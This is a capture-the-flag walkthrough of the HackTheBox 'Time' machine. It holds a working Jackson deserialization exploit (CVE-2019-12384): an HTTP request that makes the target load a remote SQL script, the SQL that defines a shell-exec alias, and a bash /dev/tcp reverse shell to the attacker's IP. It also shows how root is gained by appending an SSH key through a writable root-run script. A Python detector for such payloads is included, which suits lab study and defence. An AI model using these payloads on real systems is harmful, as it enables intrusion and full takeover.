Time HackTheBox
Recon
nmap -sC -sV 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
Note: an open port 80 should always be inspected.
Playing around with the website, you notice an error from the validate (beta) functionality. Googling this error shows that Jackson (FasterXML) is used; CVE-2019-12384 is the one to look for.
User
Exploiting
I intercepted the request to the website with Burp Suite and, following this GitHub reference, sent the following request:
Look at the JSON in the data parameter! Explained here
POST / HTTP/1.1
Host: 10.10.10.214
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 184
Origin: http://10.10.10.214
DNT: 1
Connection: close
Referer: http://10.10.10.214/
Upgrade-Insecure-Requests: 1
mode=2&data=["ch.qos.logback.core.db.DriverManagerConnectionSource",%20{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT%3d3;INIT%3dRUNSCRIPT%20FROM%20'http://10.10.14.25:8000/inject.sql'"}]
Furthermore I created an inject.sql with this content:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.25/4444 0>&1 &')
and served this SQL file with a web server started with:
python3 -m http.server
Simultaneously I started a listener with:
nc -lvnp 4444
Now I sent the request in Burp Suite and received the reverse shell on the listener I had started earlier.
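As an added example (not from this writeup or the box's application), a small Python detector that flags the two things the request above shows: Jackson's default-typing shape ["fully.qualified.Class", {...}] in the data parameter, and an H2 JDBC URL carrying INIT=RUNSCRIPT. The sample bodies and the 203.0.113.5 address are constructed.

```python
import json
import re
from urllib.parse import unquote_plus

# Constructed sample bodies for the box's "mode=2&data=" form (not captured traffic;
# 203.0.113.5 is a documentation address standing in for an attacker host).
SAMPLE_BODIES = [
    'mode=2&data={"name":"alice","age":30}',
    'mode=2&data=["ch.qos.logback.core.db.DriverManagerConnectionSource",%20'
    '{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT%3d3;INIT%3dRUNSCRIPT%20FROM%20'
    "'http://203.0.113.5:8000/inject.sql'\"}]",
    'mode=1&data=[1,2,3]',
]

# Jackson default typing serialises a polymorphic value as ["fq.ClassName", {...}].
JAVA_CLASS = re.compile(r"^[a-z][a-z0-9_]*(\.[a-z0-9_]+)+\.[A-Z][A-Za-z0-9_$]*$")
# H2's INIT=RUNSCRIPT runs a script at connection time, from a URL if one is given.
H2_RUNSCRIPT = re.compile(r"jdbc:h2:.*INIT\s*=\s*RUNSCRIPT", re.IGNORECASE)
# Gadget class named in CVE-2019-12384 (logback on the classpath).
KNOWN_GADGETS = {"ch.qos.logback.core.db.DriverManagerConnectionSource"}

def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a dict."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote_plus(value)
    return fields

def inspect_body(body: str) -> list:
    """Return the indicators found in one request body (empty list = benign)."""
    data = parse_form(body).get("data", "")
    findings = []
    try:
        doc = json.loads(data)
    except json.JSONDecodeError:
        doc = None
    if (isinstance(doc, list) and len(doc) == 2 and isinstance(doc[0], str)
            and JAVA_CLASS.match(doc[0]) and isinstance(doc[1], dict)):
        findings.append("polymorphic type hint: " + doc[0])
        if doc[0] in KNOWN_GADGETS:
            findings.append("known deserialization gadget: " + doc[0])
    if H2_RUNSCRIPT.search(data):
        findings.append("H2 JDBC URL with INIT=RUNSCRIPT")
    return findings

def scan(bodies) -> dict:
    """Map index -> findings for every body that triggered at least one indicator."""
    return {i: f for i, b in enumerate(bodies) if (f := inspect_body(b))}
```

Run it over decoded POST bodies from web server or WAF logs; the actual fix on the application side is to disable default typing (or allowlist types with a PolymorphicTypeValidator) on the ObjectMapper and upgrade jackson-databind.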
Root
/usr/bin/timer_backup.sh
is owned by root and writable by our user.
Append our public key to root's authorized_keys through it:
echo "echo SSH_PUB_KEY >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
SSH into the box as root:
ssh -i ~/.ssh/id_rsa root@10.10.10.214